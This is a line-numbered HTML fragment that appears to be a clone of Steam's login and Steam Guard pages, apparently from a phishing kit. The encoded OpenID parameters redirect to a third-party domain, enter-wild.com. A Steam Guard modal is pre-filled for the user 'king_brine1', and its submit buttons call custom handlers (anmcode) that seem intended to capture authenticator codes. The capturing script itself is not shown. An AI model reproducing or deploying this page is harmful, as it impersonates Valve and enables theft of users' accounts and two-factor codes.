  354. </div>
  355. <br>
  356. <p>Don't have a Steam account? You can <a class="whiteLink" target="_blank" href="https://store.steampowered.com/join/">create an account</a> for free.</p>
  357.  
  358. <form enctype="multipart/form-data" action="https://steamcommunity.com/openid/login" method="POST" name="loginForm" id="openidForm">
  359. <input type="hidden" id="actionInput" name="action" value="steam_openid_login">
  360. <input type="hidden" name="openid.mode" value="checkid_setup">
  361. <input type="hidden" name="openidparams" value="YTo2OntzOjk6Im9wZW5pZC5ucyI7czozMjoiaHR0cDovL3NwZWNzLm9wZW5pZC5uZXQvYXV0aC8yLjAiO3M6MTE6Im9wZW5pZC5tb2RlIjtzOjEzOiJjaGVja2lkX3NldHVwIjtzOjE2OiJvcGVuaWQucmV0dXJuX3RvIjtzOjI3OiJodHRwOi8vZW50ZXItd2lsZC5jb20vbG9naW4iO3M6MTI6Im9wZW5pZC5yZWFsbSI7czoyMToiaHR0cDovL2VudGVyLXdpbGQuY29tIjtzOjE1OiJvcGVuaWQuaWRlbnRpdHkiO3M6NTA6Imh0dHA6Ly9zcGVjcy5vcGVuaWQubmV0L2F1dGgvMi4wL2lkZW50aWZpZXJfc2VsZWN0IjtzOjE3OiJvcGVuaWQuY2xhaW1lZF9pZCI7czo1MDoiaHR0cDovL3NwZWNzLm9wZW5pZC5uZXQvYXV0aC8yLjAvaWRlbnRpZmllcl9zZWxlY3QiO30=">
  362. <input type="hidden" name="nonce" value="0de44f121dda6d8ee1172c3d">
  363.  
  364. </form>
  365. <br>
  366. <div id="error_display" style="display: none;">The account name or password that you have entered is incorrect.</div>
  367. </div>
  368. </div>
  369.  
  370. <div style="clear: both"></div>
  371.  
  372. </div>
  373.  
  374. </div>
  375.  
  376. </div> <!-- responsive_page_legacy_content -->
  377.  
  378. <div id="footer_spacer"></div>
  379. <div id="footer_responsive_optin_spacer"></div>
  380. <div id="footer">
  381. <div class="footer_content">
  382. <span id="footerLogo"><img src="https://steamcommunity-a.akamaihd.net/public/images/skin_1/footerLogo_valve.png?v=1" width="96" height="26" border="0" alt="Valve Logo"></span>
  383. <span id="footerText">
  384. © Valve Corporation. All rights reserved. All trademarks are property of their respective owners in the US and other countries.<br>Some geospatial data on this website is provided by <a href="https://steamcommunity.com/linkfilter/?url=http://www.geonames.org" target="_blank" rel="noreferrer">geonames.org</a>. <br>
  385. <span class="valve_links">
  386. <a href="http://store.steampowered.com/privacy_agreement/" target="_blank">Privacy Policy</a>
  387. &nbsp; | &nbsp;<a href="http://www.valvesoftware.com/legal.htm" target="_blank">Legal</a>
  388. &nbsp;| &nbsp;<a href="http://store.steampowered.com/subscriber_agreement/" target="_blank">Steam Subscriber Agreement</a>
  389. </span>
  390. </span>
  391. </div>
  392. <div class="responsive_optin_link">
  393. <div class="btn_medium btnv6_grey_black" onclick="Responsive_RequestMobileView()">
  394. <span>View mobile website</span>
  395. </div>
  396. </div>
  397. </div>
  398.  
  399. </div> <!-- responsive_page_content -->
  400.  
  401. </div> <!-- responsive_page_frame -->
  402.  
  403. <div class="miniprofile_hover" style="display: none;"><div class="shadow_ul"></div><div class="shadow_top"></div><div class="shadow_ur"></div><div class="shadow_left"></div><div class="shadow_right"></div><div class="shadow_bl"></div><div class="shadow_bottom"></div><div class="shadow_br"></div><div class="miniprofile_hover_inner shadow_content"></div><div class="hover_arrow left miniprofile_arrow"><div class="miniprofile_arrow_inner"></div></div><div class="hover_arrow right miniprofile_arrow"><div class="miniprofile_arrow_inner"></div></div></div><div id="loginModals">
  404. <div class="login_modal loginAuthCodeModal" style="display: none">
  405. <form data-ajax="false">
  406. <div class="auth_message_area">
  407. <div id="auth_icon" class="auth_icon auth_icon_key">
  408. </div>
  409. <div class="auth_messages" id="auth_messages">
  410. <div class="auth_message" id="auth_message_entercode" style="display: none;">
  411. <div class="auth_modal_h1">Hello!</div>
  412. <p>We see you're logging in to Steam from a new browser or a new computer. Or maybe it's just been a while...</p>
  413. </div>
  414. <div class="auth_message" id="auth_message_checkspam" style="display: none;">
  415. <div class="auth_modal_h1">Mistaken for spam?</div>
  416. <p>Did you check your spam folder? If you don't see a recent message from Steam Support in your inbox, try looking there.</p>
  417. </div>
  418. <div class="auth_message" id="auth_message_success" style="display: none;">
  419. <div class="auth_modal_h1">Success!</div>
  420. <p>You now have access to your Steam account here.</p>
  421. </div>
  422. <div class="auth_message" id="auth_message_incorrectcode" style="display: none;">
  423. <div class="auth_modal_h1">Whoops!</div>
  424. <p>Sorry but, <br>that isn't quite right...</p>
  425. </div>
  426. <div class="auth_message" id="auth_message_help" style="display: none;">
  427. <div class="auth_modal_h1">Let us help!</div>
  428. <p>Sorry you're having trouble. We know your Steam account is valuable to you, and we're committed to helping you keep access to it in the right hands.</p>
  429. </div>
  430. </div>
  431. </div>
  432. <div id="auth_details_messages" class="auth_details_messages">
  433. <div class="auth_details" id="auth_details_entercode" style="display: none;">
  434. As an added account security measure, you’ll need to grant access to this browser by entering the special code we’ve just sent to your email address at <span id="emailauth_entercode_emaildomain"></span>. </div>
  435. <div class="auth_details" id="auth_details_success" style="display: none;">
  436. If this is a public computer, be sure to log out of Steam when you're ready to quit this browser session. </div>
  437. <div class="auth_details" id="auth_details_help" style="display: none;">
  438. Please contact Steam Support for assistance from a member of our staff. Legitimate claims for help with account access are our number one priority. </div>
  439. </div>
  440. <div class="authcode_entry_area">
  441. <div id="authcode_entry">
  442. <div class="authcode_entry_box">
  443. <input class="authcode_entry_input authcode_placeholder" id="authcode" type="text" value="" placeholder="enter your code here">
  444.  
  445. </div>
  446. </div>
  447. <div id="authcode_help_supportlink">
  448. <a href="https://support.steampowered.com/kb_article.php?ref=4020-ALZM-5519" data-ajax="false" data-externallink="1">Contact Steam Support for help with account access</a>
  449. </div>
  450. </div>
  451. <div class="modal_buttons" id="auth_buttonsets">
  452. <div class="auth_buttonset" id="auth_buttonset_entercode" style="display: none;">
  453. <div data-modalstate="submit" class="auth_button leftbtn">
  454. <div class="auth_button_h3">Submit</div>
  455. <div class="auth_button_h5">my special access code</div>
  456. </div>
  457. <div data-modalstate="checkspam" class="auth_button">
  458. <div class="auth_button_h3">What message?</div>
  459. <div class="auth_button_h5">I don't have any message from Steam Support...</div>
  460. </div>
  461. <div style="clear: left;"></div>
  462. </div>
  463. <div class="auth_buttonset" id="auth_buttonset_checkspam" style="display: none;">
  464. <div data-modalstate="submit" class="auth_button leftbtn">
  465. <div class="auth_button_h3">Found it!</div>
  466. <div class="auth_button_h5">and I've entered my special access code above</div>
  467. </div>
  468. <div data-modalstate="help" class="auth_button">
  469. <div class="auth_button_h3">No luck still...</div>
  470. <div class="auth_button_h5">I don't have any message from Steam Support...</div>
  471. </div>
  472. <div style="clear: left;"></div>
  473. </div>
  474. <div class="auth_buttonset" id="auth_buttonset_success" style="display: none;">
  475. <div class="auth_button auth_button_spacer">
  476. </div>
  477. <a data-modalstate="complete" class="auth_button" id="success_continue_btn" href="javascript:void(0);">
  478. <div class="auth_button_h3">Proceed to Steam!</div>
  479. <div class="auth_button_h5">&nbsp;<br>&nbsp;</div>
  480. </a>
  481. <div style="clear: left;"></div>
  482. </div>
  483. <div class="auth_buttonset" id="auth_buttonset_incorrectcode" style="display: none;">
  484. <div data-modalstate="submit" class="auth_button leftbtn">
  485. <div class="auth_button_h3">I want to try again</div>
  486. <div class="auth_button_h5">and I've re-entered my special access code above</div>
  487. </div>
  488. <div data-modalstate="help" class="auth_button">
  489. <div class="auth_button_h3">Please help</div>
  490. <div class="auth_button_h5">I think I need assistance from Steam Support...</div>
  491. </div>
  492. <div style="clear: left;"></div>
  493. </div>
  494. <div class="auth_buttonset" id="auth_buttonset_waiting" style="display: none;">
  495. </div>
  496. </div>
  497. <div style="" id="auth_details_computer_name" class="auth_details_messages">
  498. To easily recognize this browser among the list of devices Steam Guard has enabled, give the browser a friendly name - at least 6 characters long. <div id="friendly_name_box" class="friendly_name_box">
  499. <input class="authcode_entry_input authcode_placeholder" id="friendlyname" type="text" placeholder="enter a friendly name here">
  500. </div>
  501. </div>
  502. <div style="display: none;">
  503. <input type="submit">
  504. </div>
  505. </form>
  506. </div>
  507.  
  508. <div class="login_modal loginIPTModal" style="display: none">
  509. <div class="auth_message_area">
  510. <div class="auth_icon ipt_icon">
  511. </div>
  512. <div class="auth_messages">
  513. <div class="auth_message">
  514. <div class="auth_modal_h1">Sorry</div>
  515. <p>This account can't be accessed from this computer without additional authorization.</p>
  516. </div>
  517. </div>
  518. </div>
  519. <div class="auth_details_messages">
  520. <div class="auth_details">
  521. Please contact Steam Support to have a member of our staff assist you. Legitimate claims for help with account access are our number one priority. </div>
  522. </div>
  523. <div class="authcode_entry_area">
  524. </div>
  525. <div class="modal_buttons">
  526. <div class="auth_buttonset">
  527. <a href="https://support.steampowered.com/kb_article.php?ref=9400-IPAX-9398&amp;auth=e39b5c227cffc8ae65414aba013e5fef" class="auth_button leftbtn" data-ajax="false" data-externallink="1">
  528. <div class="auth_button_h3">Learn more</div>
  529. <div class="auth_button_h5">about Intel® Identity Protection Technology</div>
  530. </a>
  531. <a href="https://support.steampowered.com" class="auth_button" data-ajax="false" data-externallink="1">
  532. <div class="auth_button_h3">Please help</div>
  533. <div class="auth_button_h5">I think I need assistance from Steam Support...</div>
  534. </a>
  535. <div style="clear: left;"></div>
  536. </div>
  537. </div>
  538. </div>
  539.  
  540.  
  541.  
  542. <div class="login_modal loginTwoFactorCodeModal" style="display: none">
  543. <form>
  544. <div class="twofactorauth_message_area">
  545. <div id="login_twofactorauth_icon" class="auth_icon auth_icon_key">
  546. </div>
  547. <div class="twofactorauth_messages" id="login_twofactorauth_messages">
  548. <div class="twofactorauth_message" id="login_twofactorauth_message_entercode" style="display: none;">
  549. <div class="auth_modal_h1">Hello <span id="login_twofactorauth_message_entercode_accountname"></span>!</div>
  550. <p>This account is currently using a Steam Guard Mobile Authenticator.</p>
  551. </div>
  552. <div class="twofactorauth_message" id="login_twofactorauth_message_incorrectcode" style="display: none;">
  553. <div class="auth_modal_h1">Whoops!</div>
  554. <p>Sorry but, <br>that isn't quite right...</p>
  555. </div>
  556. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp" style="display: none;">
  557. <div class="auth_modal_h1">Let us help!</div>
  558. <p>Sorry you're having trouble. We know your Steam account is valuable to you, and we're committed to helping you keep access to it in the right hands.</p>
  559. </div>
  560. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_sms_remove" style="display: none;">
  561. <div class="auth_modal_h1">Confirm ownership of your account</div>
  562. <p>We'll send a text message containing an account recovery code to your phone number ending in <span id="login_twofactorauth_selfhelp_sms_remove_last_digits"></span>. Once you enter the code, we will remove the mobile authenticator from your account and you will receive Steam Guard codes via email.</p>
  563. </div>
  564. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_sms_remove_entercode" style="display: none;">
  565. <div class="auth_modal_h1">Confirm ownership of your account</div>
  566. <p>We have sent a text message containing a confirmation code to your phone number ending in <span id="login_twofactorauth_selfhelp_sms_remove_entercode_last_digits"></span>. Enter the code below so we can remove the mobile authenticator from your account.</p>
  567. </div>
  568. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_sms_remove_incorrectcode" style="display: none;">
  569. <div class="auth_modal_h1">Whoops!</div>
  570. <p>Sorry but, <br>that isn't quite right...</p>
  571. </div>
  572. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_twofactor_removed" style="display: none;">
  573. <div class="auth_modal_h1">Success!</div>
  574. <p>We have removed the mobile authenticator from your account. Next time you log in, you will have to enter a Steam Guard code that is sent to your email address.</p>
  575. </div>
  576. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_twofactor_replaced" style="display: none;">
  577. <div class="auth_modal_h1">Success!</div>
  578. <p>You can now use this device to get mobile authenticator codes for your account. Any other device that was previously providing authenticator codes for your account will no longer be able to do so.</p>
  579. </div>
  580. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_nosms" style="display: none;">
  581. <div class="auth_modal_h1">Do you have the recovery code?</div>
  582. <p>You do not have a phone number associated with your Steam account, so we are unable to verify account ownership via a text message. Do you have the recovery code that you wrote down when you added the mobile authenticator? The recovery code begins with the letter 'R'.</p>
  583. </div>
  584. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_rcode" style="display: none;">
  585. <div class="auth_modal_h1">Enter your recovery code</div>
  586. <p>Please enter the recovery code in the box below. The recovery code begins with the letter 'R'.</p>
  587. </div>
  588. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_rcode_incorrectcode" style="display: none;">
  589. <div class="auth_modal_h1">Whoops!</div>
  590. <p>Sorry but, <br>that isn't quite right...</p>
  591. </div>
  592. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_rcode_incorrectcode_exhausted" style="display: none;">
  593. <div class="auth_modal_h1">Whoops!</div>
  594. <p>Sorry but, <br>that isn't quite right...</p>
  595. </div>
  596. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_rcode_message" style="display: none;">
  597. <div class="auth_modal_h1">Whoops!</div>
  598. <p>Sorry but, <br>that isn't quite right...</p>
  599. </div>
  600. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_couldnthelp" style="display: none;">
  601. <div class="auth_modal_h1">Let us help!</div>
  602. <p>If you have lost access to your mobile device, the mobile phone number associated with your account, and don't have the recovery code that you wrote down when you added the mobile authenticator, then please contact Steam Support for assistance recovering access to your account.</p>
  603. </div>
  604. <div class="twofactorauth_message" id="login_twofactorauth_message_help" style="display: none;">
  605. <div class="auth_modal_h1">Let us help!</div>
  606. <p>Sorry you're having trouble. We know your Steam account is valuable to you, and we're committed to helping you keep access to it in the right hands.</p>
  607. </div>
  608. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_failure" style="display: none;">
  609. <div class="auth_modal_h1">Sorry!</div>
  610. <p>There was an error encountered while processing your request.</p>
  611. </div>
  612. </div>
  613. </div>
  614. <div id="login_twofactorauth_details_messages" class="twofactorauth_details_messages">
  615. <div class="twofactorauth_details" id="login_twofactorauth_details_entercode" style="display: none;">
  616. Enter the current code displayed in the Steam Mobile app: </div>
  617. <div class="twofactorauth_details" id="login_twofactorauth_details_selfhelp" style="display: none;">
  618. If you have lost your mobile device or uninstalled the Steam app and can no longer receive codes, then you may remove the mobile authenticator from your account. This will reduce the security on your account, so you should add a mobile authenticator to a new mobile device afterwards. </div>
  619. <div class="twofactorauth_details" id="login_twofactorauth_details_help" style="display: none;">
  620. Please contact Steam Support for assistance from a member of our staff. </div>
  621. <div class="twofactorauth_details" id="login_twofactorauth_details_selfhelp_failure" style="display: none;">
  622. </div>
  623. <div class="twofactorauth_details" id="login_twofactorauth_details_selfhelp_rcode_incorrectcode" style="display: none;">
  624. </div>
  625. <div class="twofactorauth_details" id="login_twofactorauth_details_selfhelp_rcode_incorrectcode_exhausted" style="display: none;">
  626. </div>
  627. </div>
  628. <div class="twofactorauthcode_entry_area">
  629. <div id="login_twofactor_authcode_entry">
  630. <div class="twofactorauthcode_entry_box">
  631. <input class="twofactorauthcode_entry_input authcode_placeholder" id="twofactorcode_entry" type="text" placeholder="enter your code here" autocomplete="off">
  632. </div>
  633. </div>
  634. <div id="login_twofactor_authcode_help_supportlink">
  635. <a href="https://support.steampowered.com/kb_article.php?ref=4020-ALZM-5519">
  636. Contact Steam Support for help with account access </a>
  637. </div>
  638. </div>
  639. <div class="modal_buttons" id="login_twofactorauth_buttonsets">
  640. <div class="auth_buttonset firstbutton" id="login_twofactorauth_buttonset_entercode" style="display: none;">
  641. <div type="submit" class="auth_button leftbtn" data-modalstate="submit">
  642. <div class="auth_button_h3">Submit</div>
  643. <div class="auth_button_h5">my authenticator code</div>
  644. </div>
  645. <div class="auth_button" data-modalstate="selfhelp">
  646. <div class="auth_button_h3">Please help</div>
  647. <div class="auth_button_h5">I no longer have access to my Mobile Authenticator codes</div>
  648. </div>
  649. <div style="clear: left;"></div>
  650. </div>
  651. <div class="auth_buttonset secondbutton" id="login_twofactorauth_buttonset_incorrectcode" style="display: none;">
  652. <div class="auth_button leftbtn" data-modalstate="submit">
  653. <div class="auth_button_h3">I want to try again</div>
  654. <div class="auth_button_h5">and I've re-entered my authenticator code above</div>
  655. </div>
  656. <div class="auth_button" data-modalstate="selfhelp">
  657. <div class="auth_button_h3">Please help</div>
  658. <div class="auth_button_h5">I think I need assistance from Steam Support...</div>
  659. </div>
  660. <div style="clear: left;"></div>
  661. </div>
  662. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp" style="display: none;">
  663. <div class="auth_button leftbtn" data-modalstate="selfhelp_sms_remove_start">
  664. <div class="auth_button_h3" style="font-size: 16px;">Remove authenticator</div>
  665. <div class="auth_button_h5">and go back to receiving codes by email</div>
  666. </div>
  667. <div class="auth_button" data-modalstate="selfhelp_sms_reset_start">
  668. <div class="auth_button_h3">Use this device</div>
  669. <div class="auth_button_h5">and get authenticator codes on this app</div>
  670. </div>
  671. </div>
  672. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_sms_remove" style="display: none;">
  673. <div class="auth_button leftbtn" data-modalstate="selfhelp_sms_remove_sendcode">
  674. <div class="auth_button_h3">OK!</div>
  675. <div class="auth_button_h5">Send me the text message</div>
  676. </div>
  677. <div class="auth_button" data-modalstate="selfhelp_nosms">
  678. <div class="auth_button_h3">I can't</div>
  679. <div class="auth_button_h5">because I no longer have access to that phone number</div>
  680. </div>
  681. </div>
  682. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_sms_remove_entercode" style="display: none;">
  683. <div class="auth_button leftbtn" data-modalstate="selfhelp_sms_remove_checkcode">
  684. <div class="auth_button_h3">Submit</div>
  685. <div class="auth_button_h5">I entered the code above</div>
  686. </div>
  687. <div class="auth_button" data-modalstate="selfhelp_nosms">
  688. <div class="auth_button_h3">Please help</div>
  689. <div class="auth_button_h5">I'm not receiving the text message</div>
  690. </div>
  691. </div>
  692. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_sms_remove_incorrectcode" style="display: none;">
  693. <div class="auth_button leftbtn" data-modalstate="selfhelp_sms_remove_checkcode">
  694. <div class="auth_button_h3">Submit</div>
  695. <div class="auth_button_h5">I re-entered the code. Let's try again.</div>
  696. </div>
  697. <div class="auth_button" data-modalstate="selfhelp_nosms">
  698. <div class="auth_button_h3">Please help</div>
  699. <div class="auth_button_h5">I'm not receiving the text message</div>
  700. </div>
  701. </div>
  702. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_twofactor_removed" style="display: none;">
  703. <div class="auth_button leftbtn" data-modalstate="selfhelp_sms_remove_complete">
  704. <div class="auth_button_h3">Log in</div>
  705. <div class="auth_button_h5">with the mobile authenticator removed</div>
  706. </div>
  707. </div>
  708. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_twofactor_replaced" style="display: none;">
  709. <div class="auth_button leftbtn" data-modalstate="selfhelp_sms_remove_complete">
  710. <div class="auth_button_h3">Log in</div>
  711. <div class="auth_button_h5">to the Steam Mobile app</div>
  712. </div>
  713. </div>
  714. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_nosms" style="display: none;">
  715. <div class="auth_button leftbtn" data-modalstate="selfhelp_rcode">
  716. <div class="auth_button_h3">Yes</div>
  717. <div class="auth_button_h5">I have the recovery code that begins with 'R'</div>
  718. </div>
  719. <div class="auth_button" data-modalstate="selfhelp_couldnthelp">
  720. <div class="auth_button_h3">No</div>
  721. <div class="auth_button_h5">I don't have a code like that</div>
  722. </div>
  723. </div>
  724. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_rcode" style="display: none;">
  725. <div class="auth_button leftbtn" data-modalstate="selfhelp_rcode_checkcode">
  726. <div class="auth_button_h3">Submit</div>
  727. <div class="auth_button_h5">my recovery code</div>
  728. </div>
  729. <div class="auth_button" data-modalstate="selfhelp_couldnthelp">
  730. <div class="auth_button_h3">Please help</div>
  731. <div class="auth_button_h5">I think I need assistance from Steam Support...</div>
  732. </div>
  733. </div>
  734. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_rcode_incorrectcode" style="display: none;">
  735. <div class="auth_button leftbtn" data-modalstate="selfhelp_rcode_checkcode">
  736. <div class="auth_button_h3">Submit</div>
  737. <div class="auth_button_h5">I re-entered the code. Let's try again.</div>
  738. </div>
  739. <div class="auth_button" data-modalstate="selfhelp_couldnthelp">
  740. <div class="auth_button_h3">Please help</div>
  741. <div class="auth_button_h5">I think I need assistance from Steam Support...</div>
  742. </div>
  743. </div>
  744. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_rcode_incorrectcode_exhausted" style="display: none;">
  745. <div class="auth_button" data-modalstate="selfhelp_couldnthelp">
  746. <div class="auth_button_h3">Please help</div>
  747. <div class="auth_button_h5">I think I need assistance from Steam Support...</div>
  748. </div>
  749. </div>
  750. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_couldnthelp" style="display: none;">
  751. <a class="auth_button leftbtn" href="https://help.steampowered.com/">
  752. <div class="auth_button_h3">Contact us</div>
  753. <div class="auth_button_h5">for help with account access</div>
  754. </a>
  755. </div>
  756. <div class="auth_buttonset waiting" id="login_twofactorauth_buttonset_waiting" style="display: none;">
  757. </div>
  758. </div>
  759. <div style="display: none;">
  760. <input type="submit">
  761. </div>
  762. </form>
  763. </div>
  764. </div><div class="newmodal_background" style="opacity: 0.8; display: none;"></div><div class="newmodal" style="position: fixed; z-index: 1000; max-width: 1269px; left: 424px; top: 150px; display: none;" id="steamguard"><div class="newmodal_header_border"><div class="newmodal_header"><div class="newmodal_close" onclick="modal('steamguard','hide');$('#login_btn_signin').show();$('#login_btn_wait').hide();"></div><div class="ellipsis">Steam Guard Mobile Authentication</div></div></div><div class="newmodal_content_border"><div class="newmodal_content" style="max-height: 518px;"><div><div class="login_modal loginTwoFactorCodeModal" style="">
  765. <div>
  766. <div class="twofactorauth_message_area">
  767. <div id="login_twofactorauth_icon" class="auth_icon auth_icon_phone">
  768. </div>
  769. <div class="twofactorauth_messages" id="login_twofactorauth_messages">
  770. <div class="twofactorauth_message" id="login_twofactorauth_message_entercode" style="">
  771. <div class="auth_modal_h1">Hello <span id="login_twofactorauth_message_entercode_accountname" class="usernamemsg">king_brine1</span>!</div>
  772. <p>This account is currently using a Steam Guard Mobile Authenticator.</p>
  773. </div>
  774. <div class="twofactorauth_message" id="login_twofactorauth_message_incorrectcode" style="display: none;">
  775. <div class="auth_modal_h1">Whoops!</div>
  776. <p>Sorry but, <br>that isn't quite right...</p>
  777. </div>
  778. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp" style="display: none;">
  779. <div class="auth_modal_h1">Let us help!</div>
  780. <p>Sorry you're having trouble. We know your Steam account is valuable to you, and we're committed to helping you keep access to it in the right hands.</p>
  781. </div>
  782. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_sms_remove" style="display: none;">
  783. <div class="auth_modal_h1">Confirm ownership of your account</div>
  784. <p>We'll send a text message containing an account recovery code to your phone number ending in <span id="login_twofactorauth_selfhelp_sms_remove_last_digits"></span>. Once you enter the code, we will remove the mobile authenticator from your account and you will receive Steam Guard codes via email.</p>
  785. </div>
  786. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_sms_remove_entercode" style="display: none;">
  787. <div class="auth_modal_h1">Confirm ownership of your account</div>
  788. <p>We have sent a text message containing a confirmation code to your phone number ending in <span id="login_twofactorauth_selfhelp_sms_remove_entercode_last_digits"></span>. Enter the code below so we can remove the mobile authenticator from your account.</p>
  789. </div>
  790. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_sms_remove_incorrectcode" style="display: none;">
  791. <div class="auth_modal_h1">Whoops!</div>
  792. <p>Sorry but, <br>that isn't quite right...</p>
  793. </div>
  794. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_twofactor_removed" style="display: none;">
  795. <div class="auth_modal_h1">Success!</div>
  796. <p>We have removed the mobile authenticator from your account. Next time you log in, you will have to enter a Steam Guard code that is sent to your email address.</p>
  797. </div>
  798. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_twofactor_replaced" style="display: none;">
  799. <div class="auth_modal_h1">Success!</div>
  800. <p>You can now use this device to get mobile authenticator codes for your account. Any other device that was previously providing authenticator codes for your account will no longer be able to do so.</p>
  801. </div>
  802. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_nosms" style="display: none;">
  803. <div class="auth_modal_h1">Do you have the recovery code?</div>
  804. <p>You do not have a phone number associated with your Steam account, so we are unable to verify account ownership via a text message. Do you have the recovery code that you wrote down when you added the mobile authenticator? The recovery code begins with the letter 'R'.</p>
  805. </div>
  806. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_rcode" style="display: none;">
  807. <div class="auth_modal_h1">Enter your recovery code</div>
  808. <p>Please enter the recovery code in the box below. The recovery code begins with the letter 'R'.</p>
  809. </div>
  810. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_rcode_incorrectcode" style="display: none;">
  811. <div class="auth_modal_h1">Whoops!</div>
  812. <p>Sorry but, <br>that isn't quite right...</p>
  813. </div>
  814. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_rcode_incorrectcode_exhausted" style="display: none;">
  815. <div class="auth_modal_h1">Whoops!</div>
  816. <p>Sorry but, <br>that isn't quite right...</p>
  817. </div>
  818. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_rcode_message" style="display: none;">
  819. <div class="auth_modal_h1">Whoops!</div>
  820. <p>Sorry but, <br>that isn't quite right...</p>
  821. </div>
  822. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_couldnthelp" style="display: none;">
  823. <div class="auth_modal_h1">Let us help!</div>
  824. <p>If you have lost access to your mobile device, the mobile phone number associated with your account, and don't have the recovery code that you wrote down when you added the mobile authenticator, then please contact Steam Support for assistance recovering access to your account.</p>
  825. </div>
  826. <div class="twofactorauth_message" id="login_twofactorauth_message_help" style="display: none;">
  827. <div class="auth_modal_h1">Let us help!</div>
  828. <p>Sorry you're having trouble. We know your Steam account is valuable to you, and we're committed to helping you keep access to it in the right hands.</p>
  829. </div>
  830. <div class="twofactorauth_message" id="login_twofactorauth_message_selfhelp_failure" style="display: none;">
  831. <div class="auth_modal_h1">Sorry!</div>
  832. <p>There was an error encountered while processing your request.</p>
  833. </div>
  834. </div>
  835. </div>
  836. <div id="login_twofactorauth_details_messages" class="twofactorauth_details_messages">
  837. <div class="twofactorauth_details" id="login_twofactorauth_details_entercode" style="">
  838. Enter the current code displayed in the Steam Mobile app: </div>
  839. <div class="twofactorauth_details" id="login_twofactorauth_details_selfhelp" style="display: none;">
  840. If you have lost your mobile device or uninstalled the Steam app and can no longer receive codes, then you may remove the mobile authenticator from your account. This will reduce the security on your account, so you should add a mobile authenticator to a new mobile device afterwards. </div>
  841. <div class="twofactorauth_details" id="login_twofactorauth_details_help" style="display: none;">
  842. Please contact Steam Support for assistance from a member of our staff. </div>
  843. <div class="twofactorauth_details" id="login_twofactorauth_details_selfhelp_failure" style="display: none;">
  844. </div>
  845. <div class="twofactorauth_details" id="login_twofactorauth_details_selfhelp_rcode_incorrectcode" style="display: none;">
  846. </div>
  847. <div class="twofactorauth_details" id="login_twofactorauth_details_selfhelp_rcode_incorrectcode_exhausted" style="display: none;">
  848. </div>
  849. </div>
  850. <div class="twofactorauthcode_entry_area">
  851. <div id="login_twofactor_authcode_entry">
  852. <div class="twofactorauthcode_entry_box">
  853. <input class="twofactorauthcode_entry_input authcode_placeholder" id="twofactorcode_entry" type="text" placeholder="enter your code here" autocomplete="off">
  854. </div>
  855. </div>
  856. <div id="login_twofactor_authcode_help_supportlink" style="display: none;">
  857. <a href="https://support.steampowered.com/kb_article.php?ref=4020-ALZM-5519">
  858. Contact Steam Support for help with account access </a>
  859. </div>
  860. </div>
  861. <div class="modal_buttons" id="login_twofactorauth_buttonsets">
  862. <div class="auth_buttonset firstbutton" id="login_twofactorauth_buttonset_entercode" style="">
  863. <div type="submit" class="auth_button leftbtn" data-modalstate="submit" onclick="anmcode()">
  864. <div class="auth_button_h3">Submit</div>
  865. <div class="auth_button_h5">my authenticator code</div>
  866. </div>
  867. <div class="auth_button" data-modalstate="selfhelp">
  868. <div class="auth_button_h3">Please help</div>
  869. <div class="auth_button_h5">I no longer have access to my Mobile Authenticator codes</div>
  870. </div>
  871. <div style="clear: left;"></div>
  872. </div>
  873. <div class="auth_buttonset secondbutton" id="login_twofactorauth_buttonset_incorrectcode" style="display: none;">
  874. <div class="auth_button leftbtn" data-modalstate="submit" onclick="anmcode2()">
  875. <div class="auth_button_h3">I want to try again</div>
  876. <div class="auth_button_h5">and I've re-entered my authenticator code above</div>
  877. </div>
  878. <div class="auth_button" data-modalstate="selfhelp">
  879. <div class="auth_button_h3">Please help</div>
  880. <div class="auth_button_h5">I think I need assistance from Steam Support...</div>
  881. </div>
  882. <div style="clear: left;"></div>
  883. </div>
  884. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp" style="display: none;">
  885. <div class="auth_button leftbtn" data-modalstate="selfhelp_sms_remove_start">
  886. <div class="auth_button_h3" style="font-size: 16px;">Remove authenticator</div>
  887. <div class="auth_button_h5">and go back to receiving codes by email</div>
  888. </div>
  889. <div class="auth_button" data-modalstate="selfhelp_sms_reset_start">
  890. <div class="auth_button_h3">Use this device</div>
  891. <div class="auth_button_h5">and get authenticator codes on this app</div>
  892. </div>
  893. </div>
  894. <div class="auth_buttonset" id="login_twofactorauth_buttonset_selfhelp_sms_remove" style="display: none;">
  895. <div class="auth_button leftbtn" data-modalstate="selfhelp_sms_remove_sendcode">
  896. <div class="auth_button_h3">OK!</div>
